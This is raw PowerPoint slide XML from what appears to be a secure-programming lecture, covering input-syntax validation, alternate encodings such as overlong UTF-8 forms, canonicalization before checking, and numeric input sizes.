                  <a:pt x="19050" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21336" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38909" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40386" y="19050"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643890" y="5644134"/>
            <a:ext cx="40640" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40640" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21336" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38909" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40386" y="19050"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643890" y="5644134"/>
            <a:ext cx="40640" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40640" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21336" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38909" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40386" y="19050"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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12" name="object 12"/>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21</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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952242" y="1006855"/>
            <a:ext cx="4151629" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Validating </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1832874"/>
            <a:ext cx="7792720" cy="4763135"/>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spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ensure input data meets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assumptions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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>printable, HTML, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>email, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Compare to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is known</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>acceptable…</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>..not to known dangerous (enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>badness)  as this can miss new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>problems</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Common to use regular</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>expressions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pattern </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of characters describe allowable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>details vary between</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>languages</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Bad input either rejected or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>altered</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22</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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193795" y="1006855"/>
            <a:ext cx="3672204" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Alternate</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Encodings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2061442"/>
            <a:ext cx="7470140" cy="4266565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="59055" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>May </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have multiple means of encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>text</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>due </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>structured form of data, e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>HTML</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or via use of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>some </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sets</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Unicode used for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>internationalization</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>uses 16-bit value for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>characters</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UTF-8 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>encodes as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1-4 byte</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sequences</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>redundant variants; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2F, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>but C0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-210" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>AF  and E0 80 AF may also be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-195" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accepted</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="315"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Must canonicalize input before checking</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23</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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817367" y="1006855"/>
            <a:ext cx="4424045" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Validating </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840739" y="1909826"/>
            <a:ext cx="7494270" cy="4385310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="58419" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="459"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>May have data representing numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>values</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Internally stored in fixed sized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:endParaRPr sz="30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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>8, 16, 32, 64-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>integers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or 32, 64, 96</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>float</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755015" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
